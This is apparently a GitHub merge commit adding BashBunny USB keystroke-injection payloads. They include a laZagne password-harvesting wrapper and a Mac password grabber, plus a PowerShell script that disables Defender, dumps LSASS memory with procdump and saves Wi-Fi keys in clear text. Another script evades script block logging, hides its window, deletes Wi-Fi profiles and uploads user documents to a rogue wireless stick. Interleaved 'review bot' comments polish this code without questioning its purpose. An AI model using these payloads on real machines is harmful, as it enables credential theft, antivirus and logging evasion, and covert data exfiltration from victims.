Merge branch 'hak5:master' into master

pull/480/head
0iphor13 2021-12-22 14:35:10 +01:00 committed by GitHub
commit d9bdd824f1
41 changed files with 39375 additions and 0 deletions



@ -0,0 +1,238 @@
# -*- coding: utf-8 -*-
# !/usr/bin/python
##############################################################################
# #
# By Alessandro ZANNI #
# #
##############################################################################
# Disclaimer: Do Not Use this program for illegal purposes ;)
import argparse
import logging
import sys
import os
import time
# Configuration
from lazagne.config.write_output import write_in_file, StandardOutput
from lazagne.config.manage_modules import get_categories
from lazagne.config.constant import constant
from lazagne.config.run import run_lazagne, create_module_dic
# Object used to manage the output / write functions (cf write_output file)
constant.st = StandardOutput()
modules = create_module_dic()
def output(output_dir=None, txt_format=False, json_format=False, all_format=False):
if output_dir:
if os.path.isdir(output_dir):
constant.folder_name = output_dir
else:
print('[!] Specify a directory, not a file !')
if txt_format:
constant.output = 'txt'
if json_format:
constant.output = 'json'
if all_format:
constant.output = 'all'
if constant.output:
if not os.path.exists(constant.folder_name):
os.makedirs(constant.folder_name)
# constant.file_name_results = 'credentials' # let the choice of the name to the user
if constant.output != 'json':
constant.st.write_header()
def quiet_mode(is_quiet_mode=False):
if is_quiet_mode:
constant.quiet_mode = True
def verbosity(verbose=0):
# Write on the console + debug file
if verbose == 0:
level = logging.CRITICAL
elif verbose == 1:
level = logging.INFO
elif verbose >= 2:
level = logging.DEBUG
formatter = logging.Formatter(fmt='%(message)s')
stream = logging.StreamHandler(sys.stdout)
stream.setFormatter(formatter)
root = logging.getLogger()
root.setLevel(level)
# If other logging are set
for r in root.handlers:
r.setLevel(logging.CRITICAL)
root.addHandler(stream)
def manage_advanced_options(user_password=None, dictionary_attack=None):
if user_password:
constant.user_password = user_password
if dictionary_attack:
constant.dictionary_attack = dictionary_attack
def clean_args(arg):
"""
Remove not necessary values to get only subcategories
"""
for i in ['output', 'write_normal', 'write_json', 'write_all', 'verbose', 'auditType', 'quiet']:
try:
del arg[i]
except Exception:
pass
return arg
def runLaZagne(category_selected='all', subcategories={}, password=None, interactive=False):
"""
This function will be removed, still there for compatibility with other tools
Everything is on the config/run.py file
"""
for pwd_dic in run_lazagne(
category_selected=category_selected,
subcategories=subcategories,
password=password,
interactive=interactive
):
yield pwd_dic
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=constant.st.banner, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--version', action='version', version='Version ' + str(constant.CURRENT_VERSION),
help='laZagne version')
# ------------------------------------------- Permanent options ------------------------------------------
# Version and verbosity
PPoptional = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
PPoptional._optionals.title = 'optional arguments'
PPoptional.add_argument('-i', '--interactive', default=False, action='store_true',
help='will prompt a window to the user')
PPoptional.add_argument('-password', dest='password', action='store',
help='user password used to decrypt the keychain')
PPoptional.add_argument('-attack', dest='attack', action='store_true',
help='500 well known passwords used to check the user hash (could take a while)')
PPoptional.add_argument('-v', dest='verbose', action='count', help='increase verbosity level', default=0)
PPoptional.add_argument('-quiet', dest='quiet', action='store_true',
help='quiet mode: nothing is printed to the output', default=False, )
# Output
PWrite = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
PWrite._optionals.title = 'Output'
PWrite.add_argument('-oN', dest='write_normal', action='store_true', help='output file in a readable format')
PWrite.add_argument('-oJ', dest='write_json', action='store_true', help='output file in a json format')
PWrite.add_argument('-oA', dest='write_all', action='store_true', help='output file in all format')
PWrite.add_argument('-output', dest='output', action='store', help='destination path to store results (default:.)',
default='.')
# -------------------------------- Add options and suboptions to all modules ------------------------------
all_subparser = []
categories = get_categories()
for c in categories:
categories[c]['parser'] = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
categories[c]['parser']._optionals.title = categories[c]['help']
# Manage options
categories[c]['subparser'] = []
for module in modules[c]:
m = modules[c][module]
categories[c]['parser'].add_argument(m.options['command'], action=m.options['action'], dest=m.options['dest'],
help=m.options['help'])
# Manage all sub options by modules
if m.suboptions:
tmp = []
for sub in m.suboptions:
tmp_subparser = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
tmp_subparser._optionals.title = sub['title']
if 'type' in sub:
tmp_subparser.add_argument(sub['command'], type=sub['type'], action=sub['action'],
dest=sub['dest'], help=sub['help'])
else:
tmp_subparser.add_argument(sub['command'], action=sub['action'], dest=sub['dest'],
help=sub['help'])
tmp.append(tmp_subparser)
all_subparser.append(tmp_subparser)
categories[c]['subparser'] += tmp
# ------------------------------------------- Print all -------------------------------------------
parents = [PPoptional] + all_subparser + [PWrite]
dic = {'all': {'parents': parents, 'help': 'Run all modules'}}
for c in categories:
parser_tab = [PPoptional, categories[c]['parser']]
if 'subparser' in categories[c]:
if categories[c]['subparser']:
parser_tab += categories[c]['subparser']
parser_tab += [PWrite]
dic_tmp = {c: {'parents': parser_tab, 'help': 'Run %s module' % c}}
dic = dict(list(dic.items()) + list(dic_tmp.items()))
subparsers = parser.add_subparsers(help='Choose a main command')
for d in dic:
subparsers.add_parser(d, parents=dic[d]['parents'], help=dic[d]['help']).set_defaults(auditType=d)
# ------------------------------------------- Parse arguments -------------------------------------------
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = dict(parser.parse_args()._get_kwargs())
arguments = parser.parse_args()
# Define constant variables
output(
output_dir=args['output'],
txt_format=args['write_normal'],
json_format=args['write_json'],
all_format=args['write_all']
)
verbosity(verbose=args['verbose'])
manage_advanced_options(user_password=args.get('password', None), dictionary_attack=args.get('attack', None))
quiet_mode(is_quiet_mode=args['quiet'])
# Print the title
constant.st.first_title()
start_time = time.time()
category_selected = args['auditType']
subcategories = clean_args(args)
for r in runLaZagne(
category_selected=category_selected,
subcategories=subcategories,
password=args.get('password', None),
interactive=arguments.interactive
):
pass
write_in_file(constant.stdout_result)
constant.st.print_footer(elapsed_time=str(time.time() - start_time))



@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: Mac Password Grabber
# Author: Overtimedev
# Version: 1.0
#
# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass
# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
#
# Amber..............Executing payload
# Green..............Finished
#
LED G R
ATTACKMODE HID STORAGE
lootdir=loot/MacPass
mkdir -p /root/udisk/$lootdir
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 3000
QUACK STRING cd /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 1000
QUACK STRING python get-pip.py
QUACK ENTER
QUACK DELAY 3000
QUACK STRING pip install -r requirements.txt
QUACK ENTER
QUACK DELAY 3000
QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
QUACK ENTER
QUACK DELAY 10000
QUACK STRING killall Terminal
QUACK ENTER
# Sync filesystem
sync
# Green LED for finished
LED G
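Review bot: The header's description lines are garbled: `# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass` followed by `# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)` reads like a broken edit of `# Steals Mac passwords using laZagne.py, then stashes them in /root/udisk/loot/MacPass` and `# (Replace PASSWORD with your victim's Mac password in payload.txt)`, and the `vicims` typo is repeated in this payload's README. The header lists Amber and Green states while the script drives the LED with `LED G R` and `LED G`; a comment saying which colour `LED G R` is meant to show would let the STATUS text be checked against the code. The script creates `/root/udisk/loot/MacPass` but the laZagne command writes to `loot/MacPass` relative to `/Volumes/BashBunny/`; the two coincide only when the bunny is mounted at that path, which is worth stating in the header.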


@ -0,0 +1,25 @@
# Mac Password Grabber for the BashBunny
* Author: Overtimedev
* Version: Version 1.0
* Target: OSX
## Description
Steals Mac Passwords using laZagne.py then stashes them in /loot/MacPass
1. put get-pip.py, laZagne.py and requirements.txt in the root folder of the bunny
2. unzip lazagne.zip into the root folder of the bunny
3. Replace PASSWORD, with your vicims mac computer password in payload.txt
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Executin Payload |
| Green | Attack Finished |


@ -0,0 +1,8 @@
psutil; sys_platform == 'linux' or sys_platform == 'linux2'
secretstorage; sys_platform == 'linux' or sys_platform == 'linux2'
pyasn1
enum34; python_version < '3.4' and sys_platform == 'win32'
rsa; sys_platform == 'win32'
https://github.com/AlessandroZ/pypykatz/archive/master.zip; python_version < '3.4' and sys_platform == 'win32'
https://github.com/skelsec/pypykatz/archive/master.zip; python_version > '3.5' and sys_platform == 'win32'
pycryptodome
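Review bot: The two pypykatz entries resolve to a mutable `archive/master.zip` URL, so each install pulls whatever is on that branch at that moment with no integrity check, and the remaining entries carry no version at all. For a dependency list that gets copied onto removable media and installed on other hosts, pin each package to a version and point the archive lines at an immutable ref, e.g. `https://github.com/skelsec/pypykatz/archive/<COMMIT-SHA>.zip`, ideally with `--hash=` values so `pip install --require-hashes` can verify what is fetched. The markers `python_version < '3.4'` and `python_version > '3.5'` leave 3.4 and 3.5 matched by neither archive line; if that is intended, a comment should say so. This looks like a copy of laZagne's own requirements file; if so, the laZagne version it was taken from should be recorded next to it.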


@ -0,0 +1,38 @@
DELAY 5000
GUI d
DELAY 1200
GUI r
DELAY 1200
STRING powershell -nologo -noni -ep bypass
CTRL-SHIFT ENTER
DELAY 2000
LEFT
DELAY 1000
ENTER
DELAY 1000
STRING mode con:cols=100 lines=1
ENTER
DELAY 500
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
ENTER
DELAY 200
STRING $usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name; powershell -nologo -noni -ep bypass -File $usb\payloads\switch1\run.ps1
ENTER
DELAY 35000
STRING function eject {$driveEject = New-Object -comObject Shell.Application;$driveEject.Namespace(17).ParseName("$usb").InvokeVerb("Eject")}
ENTER
DELAY 1000
STRING echo "Successful PWNd..."
ENTER
DELAY 1000
STRING eject
ENTER
DELAY 1000
STRING Set-MpPreference -DisableRealtimeMonitoring $false
ENTER
DELAY 1000
STRING exit
ENTER


@ -0,0 +1,9 @@
#!/bin/bash
LED SETUP
ATTACKMODE STORAGE HID VID_0X0D8C PID_0X0012
LED ATTACK
LED R B
QUACK switch1/duck_code.txt
sync;sleep 1;sync
LED FINISH
LED G
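Review bot: This payload.txt has no header block, while the other payloads in this commit open with `# Title:`, `# Author:`, `# Version:`, `# Target:`, `# Attackmodes:` and `# Requirements:` comments (compare the Win SSH server and SanDisk payloads); without one a reader cannot tell from the file that it depends on `switch1/duck_code.txt` and `switch1/run.ps1` or which LED states to expect. `LED ATTACK` on the fourth line is immediately replaced by `LED R B` on the next, so one of the two is dead; keep the intended one and list it in the header's STATUS section. `sync;sleep 1;sync` would read better as three lines under a `# Sync filesystem` comment, the style the Mac Password Grabber payload uses.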



@ -0,0 +1,159 @@
## ##
## Ducked script by scaery v.1.0 ##
## ________ __ .___ ##
## \______ \ __ __ ____ | | __ ____ __| _/ ##
## | | \| | \_/ ___\| |/ // __ \ / __ | ##
## | ` \ | /\ \___| <\ ___// /_/ | ##
## /_______ /____/ \___ >__|_ \\___ >____ | ##
## \/ \/ \/ \/ \/ ##
## ##
## Windows Enumeration - LSASS Dump - Wifi Credential Dumper ##
## ##
####################################################################
$switch = "switch1"
$usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name
$usb_loot = "loot\"
$date = Get-Date -UFormat "%Y-%m-%d-%H-%M"
$loot = $usb + $usb_loot + $env:computername + "_" + $date
$usb_create = New-Item -ItemType directory $loot
$proc = "$usb\payloads\$switch\procdump.txt"
$proc_decode = certutil -decode $proc exec.exe
$procdump = "$usb\payloads\$switch\exec.exe"
$proc_run = cmd.exe /c exec.exe -ma lsass.exe -accepteula "$loot\$date-lsass.$env:computername.dmp"
$wifi = (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Out-File $loot\$date-wifidump.log
$lines="------------------------------------------"
function whost($a) {
Write-Host
Write-Host -ForegroundColor Green $lines
Write-Host -ForegroundColor Green " "$a
Write-Host -ForegroundColor Green $lines
}
whost "Windows Enumeration Script v 0.1
original by absolomb
modified by scaery
!!!!!!!!!"
$commands = [ordered]@{
'Basic System Information' = 'Start-Process "systeminfo" -NoNewWindow -Wait';
'Environment Variables' = 'Get-ChildItem Env: | ft Key,Value';
'Network Information' = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address';
'DNS Servers' = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft';
'ARP cache' = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State';
'Routing Table' = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex';
'Network Connections' = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft';
'Connected Drives' = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft';
'Firewall Config' = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft';
'Current User' = 'Write-Host $env:UserDomain\$env:UserName';
'User Privileges' = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft';
'Local Users' = 'Get-LocalUser | ft Name,Enabled,LastLogon';
'Logged in Users' = 'Start-Process "qwinsta" -NoNewWindow -Wait | ft';
'Credential Manager' = 'start-process "cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft'
'User Autologon Registry Items' = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft';
'Local Groups' = 'Get-LocalGroup | ft Name';
'Local Administrators EN' = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource';
'Local Administrators DE' = 'Get-LocalGroupMember Administratoren | ft Name, PrincipalSource';
'User Directories' = 'Get-ChildItem C:\Users | ft Name';
'Searching for SAM backup files' = 'Test-Path %SYSTEMROOT%\repair\SAM ; Test-Path %SYSTEMROOT%\system32\config\regback\SAM';
'Running Processes' = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize';
'Installed Software Directories' = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime';
'Software in Registry' = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name';
'Folders with Everyone Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft';
'Folders with BUILTIN\User Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\Users"} } catch {}} | ft';
'Checking registry for AlwaysInstallElevated' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft';
'Unquoted Service Paths' = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft';
'Scheduled Tasks' = 'Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State';
'Tasks Folder' = 'Get-ChildItem C:\Windows\Tasks | ft';
'Startup Commands' = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl';
}
function RunCommands($commands) {
ForEach ($command in $commands.GetEnumerator()) {
whost $command.Name
Invoke-Expression $command.Value
}
}
# Disable Notifications
New-Item HKCU:\Software\Policies\Microsoft\Windows\Explorer -Force
$registryPath1 = "HKCU:\Software\Policies\Microsoft\Windows\Explorer"
$Name1 = "DisableNotificationCenter"
$value1 = "00000001"
IF(!(Test-Path $registryPath1)) {
New-Item -Path $registryPath1 -Force | Out-Null
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
-PropertyType DWORD -Force | Out-Null
}
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance -Force
$registryPath2 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance"
$Name2 = "Enabled"
$value2 = "00000000"
IF(!(Test-Path $registryPath2)) {
New-Item -Path $registryPath2 -Force | Out-Null
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
-PropertyType DWORD -Force | Out-Null
}
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel -Force
$registryPath3 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel"
$Name3 = "Enabled"
$value3 = "00000000"
IF(!(Test-Path $registryPath3)) {
New-Item -Path $registryPath3 -Force | Out-Null
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
-PropertyType DWORD -Force | Out-Null
}
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay -Force
$registryPath4 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay"
$Name4 = "Enabled"
$value4 = "00000000"
IF(!(Test-Path $registryPath4)) {
New-Item -Path $registryPath4 -Force | Out-Null
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
-PropertyType DWORD -Force | Out-Null
}
$notify_disable={
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 0
}
$notify_enable={
Remove-Item $registryPath1 -Force | Out-Null
Remove-Item $registryPath2 -Force | Out-Null
Remove-Item $registryPath3 -Force | Out-Null
Remove-Item $registryPath4 -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 1
}
##################### EXECUTION STEPS ######################################
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
Invoke-Command -Scriptblock $notify_disable
RunCommands($commands) > $loot\$date-winenum.log
whost "Procdump LSASS! AV-free! Caution: Not Defender aware!"
$proc_run
whost "Dumping Wifi Credentials to USB"
$wifi
whost "Hiding traces and notifications"
Invoke-Command -Scriptblock $notify_enable
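Review bot: `$procdump = "$usb\payloads\$switch\exec.exe"` is assigned and never read; the `$proc_run` line after it invokes `exec.exe` from the current directory instead, so the variable should be removed or its intent documented. In the `$commands` table the `'Credential Manager'` entry is the only one without a trailing `;`; a newline is a valid separator in a hashtable literal, but the inconsistency reads like a typo. `$wifi` captures a pipeline that ends in `Out-File`, so it is `$null` when echoed under the "Dumping Wifi Credentials to USB" banner, and both that pipeline and `$proc_run` execute at assignment time near the top of the file, well before their `whost` banners print; the banners therefore describe work that has already happened, which is at least worth a comment. `RunCommands($commands)` passes the table as a single parenthesised argument; `RunCommands $commands` is the PowerShell convention.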


@ -0,0 +1,27 @@
# Title: Win SSH server
# Description: Installs and runs a SSH Server on Windows.
# Author: Cribbit
# Version: 1.0
# Category: Execution
# Target: Windows 10 Creators Update (Powershell 5.1+)
# Attackmodes: HID
# Requirements: Admin Privileges and an Online Connection
# Notes: Add ` -StartupType 'Automatic'` after Start-Service to start ssh on boot
LED SETUP
ATTACKMODE HID
LED ATTACK
Q DELAY 200
# Admin Powershell need Windows 10 Creators Update
Q GUI x
Q STRING a
sleep 2
# Q ALT y this work for EN y=yes
# This works for all languages
Q LEFT
Q ENTER
sleep 5
Q STRING "Get-WindowsCapability -Online | ? Name -like 'OpenSSH.Server*' | ? State -EQ 'NotPresent' | % {Add-WindowsCapability -Online -Name \$_.Name}; Start-Service sshd"
# Q ENTER
LED FINISH


@ -0,0 +1,27 @@
# SSH server
- Author: Cribbit
- Version: 1.0
- Target: Windows 10 Creators Update (Powershell)
- Category: Execution
- Attackmode: HID
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Installs and runs a SSH Server on Windows.
## Notes
This payload needs an admin powershell prompt and an internet connection to run.
## Configuration
Add ` -StartupType 'Automatic'` after Start-Service to start ssh on boot.
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Script is finished |


@ -0,0 +1,40 @@
# Files Exfiltration with "SanDisk Wireless Stick"
- Title: "SanDisk Wireless Stick" Exfiltration
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows 10
- Category: Exfiltration
## Description
Uses the "SanDisk Wireless Stick" for files exfiltration.
1) Avoids "PowerShell Script Block Logging".
2) Hide "PowerShell" window.
3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again.
6) Exfiltration of the files via the HTTP channel.
## Configuration
In the web interface of the "SanDisk Wireless Stick" after update, change the following values :
![SanDisk-Configuration.png](./assets/SanDisk-Configuration.png)
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly SANDISK_SSID="HAK5-EXFIL"
readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
readonly SANDISK_LOOT="loots"
readonly USER_DIRECTORY="~\\"
readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
```
## Link
[SanDisk Vendor](https://www.sandisk.com/goto/connect)



@ -0,0 +1,159 @@
#
# Author: TW-D
# Version: 1.0
#
param (
[string] $SSID,
[string] $PSK,
[string] $LOOT,
[string] $DIRECTORY,
[string] $EXTENSION
)
# Avoids "PowerShell Script Block Logging".
#
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
$etw_provider.SetValue($null, $event_provider)
# Hide "PowerShell" window.
#
$Script:showWindowAsync = Add-Type -MemberDefinition @"
[DllImport("user32.dll")]
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
If ($SSID -And $PSK -And $LOOT -And $DIRECTORY -And $EXTENSION) {
# Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
#
$interface_guid = (Get-NetAdapter -Physical -Name "Wi-Fi" | WHERE Status -eq "Up").InterfaceGuid
If ($interface_guid) {
$wlan_service_path = "C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\${interface_guid}\"
$wlan_service_items = Get-ChildItem -Path $wlan_service_path -Recurse
$wlan_service_items | ForEach-Object {
[xml] $xml_content = Get-Content -Path $_.FullName
$mode = $xml_content.WLANProfile.connectionMode
$name = $xml_content.WLANProfile.name
If ($mode -eq "auto") {
(NETSH WLAN DELETE PROFILE name="$name") | Out-Null
}
}
}
# Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
#
$profile_guid = "{" + [guid]::NewGuid().ToString() + "}"
$profile_path = "${env:TEMP}\${profile_guid}.xml"
$ssid_hex = ($SSID.ToCharArray() | ForEach-Object { [System.String]::Format("{0:X}", [System.Convert]::ToUInt32($_)) })
@"
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
<name>${SSID}</name>
<SSIDConfig>
<SSID>
<hex>${ssid_hex}</hex>
<name>${SSID}</name>
</SSID>
</SSIDConfig>
<connectionType>ESS</connectionType>
<connectionMode>auto</connectionMode>
<MSM>
<security>
<authEncryption>
<authentication>WPA2PSK</authentication>
<encryption>AES</encryption>
<useOneX>false</useOneX>
</authEncryption>
<sharedKey>
<keyType>passPhrase</keyType>
<protected>false</protected>
<keyMaterial>${PSK}</keyMaterial>
</sharedKey>
</security>
</MSM>
<MacRandomization xmlns="http://www.microsoft.com/networking/WLAN/profile/v3">
<enableRandomization>false</enableRandomization>
</MacRandomization>
</WLANProfile>
"@ | Out-File -FilePath "${profile_path}"
(NETSH WLAN ADD PROFILE filename="${profile_path}") | Out-Null
Remove-Item -Path "${profile_path}" -Force
# Checks whether the Wi-Fi interface is connected to the "SanDisk".
# Whether the gateway can be reached.
# If not, automatically starts again.
#
While ($TRUE) {
$ConnectionError = $NULL
Try {
(NETSH WLAN CONNECT name="$SSID") | Out-Null
$wifi_connected = (Get-NetConnectionProfile).Name
$gateway_address = (Get-NetRoute -DestinationPrefix 0.0.0.0/0 | Select-Object -ExpandProperty NextHop)
$gateway_reachable = (Test-Connection -ComputerName $gateway_address -Quiet)
If ($wifi_connected -eq $SSID -And $gateway_reachable) {
Break
}
} Catch {
$ConnectionError = $_
Start-Sleep -Seconds 8
}
}
#
# Exfiltration of the files via the HTTP channel.
#
Function Invoke-CustomRequest($Url, $Method) {
$RequestError = $NULL
Try {
$request = [System.Net.WebRequest]::Create($Url)
$request.Method = $Method
$request.GetResponse().Close()
} Catch {
$RequestError = $_
return $FALSE
}
return $TRUE
}
Function Invoke-UploadRequest($Url, $File) {
$RestError = $NULL
Try {
$empty = [String]::IsNullOrWhiteSpace((Get-Content -Path $File))
If (!$empty) {
Invoke-RestMethod -Uri $Url -Method PUT -InFile $File
}
} Catch {
$RestError = $_
}
}
Function Exfiltration-Files($Directory, $Extension, $Url) {
$files = Get-ChildItem -Path $Directory -Include ($Extension.split(",")) -Recurse
ForEach ($file in $files) {
$random = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_} ) )
$basename = Split-Path -Path "${file}" -Leaf -Resolve
Invoke-UploadRequest -Url "${Url}${random}-${basename}" -File "${file}" | Out-Null
}
}
$sandisk_loot = "http://${gateway_address}/myconnect/${LOOT}/"
$check_loot = Invoke-CustomRequest -Url $sandisk_loot -Method "GET"
If ($check_loot) {
Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
} Else {
Invoke-CustomRequest -Url $sandisk_loot -Method "MKCOL" | Out-Null
Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
}
# Cleanup
#
(NETSH WLAN DELETE PROFILE name="$SSID") | Out-Null
Exit
}
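Review bot: The `ForEach-Object` loop over `$wlan_service_items` permanently deletes every auto-connect Wi-Fi profile on the host, and the `# Cleanup` block at the end only removes the `$SSID` profile, so the change is irreversible and neither this file nor the README says so; a `# NOTE: existing auto-connect profiles are deleted and are not restored by the cleanup step` beside the loop, and a matching sentence in the README's Description, would let the person running it judge the impact first. `$ConnectionError`, `$RequestError` and `$RestError` are assigned inside the `Catch` blocks but never read, so the assignments are dead code; drop them or comment why they are kept. `Exfiltration-Files` does not use an approved verb, unlike `Invoke-CustomRequest` and `Invoke-UploadRequest` beside it. The hex `<hex>${ssid_hex}</hex>` element interpolates an array, which PowerShell joins with `$OFS` (a space by default); whether the resulting value is what the profile schema expects is not verifiable from this file and deserves a comment.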


@ -0,0 +1,74 @@
#!/bin/bash
#
# Title: SanDisk Wireless Stick Exfiltration
#
# Description: Files Exfiltration with "SanDisk Wireless Stick"
#
# Author: TW-D
# Version: 1.0
# Category: Exfiltration
# Target: Microsoft Windows 10
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# REQUIREMENTS
# ===============
# SanDisk Wireless Stick 16Go/32Go - Firmware 4.1.0 (2050)
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
#
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly SANDISK_SSID="HAK5-EXFIL"
readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
readonly SANDISK_LOOT="loots"
readonly USER_DIRECTORY="~\\"
readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
######## ATTACK ########
LED ATTACK
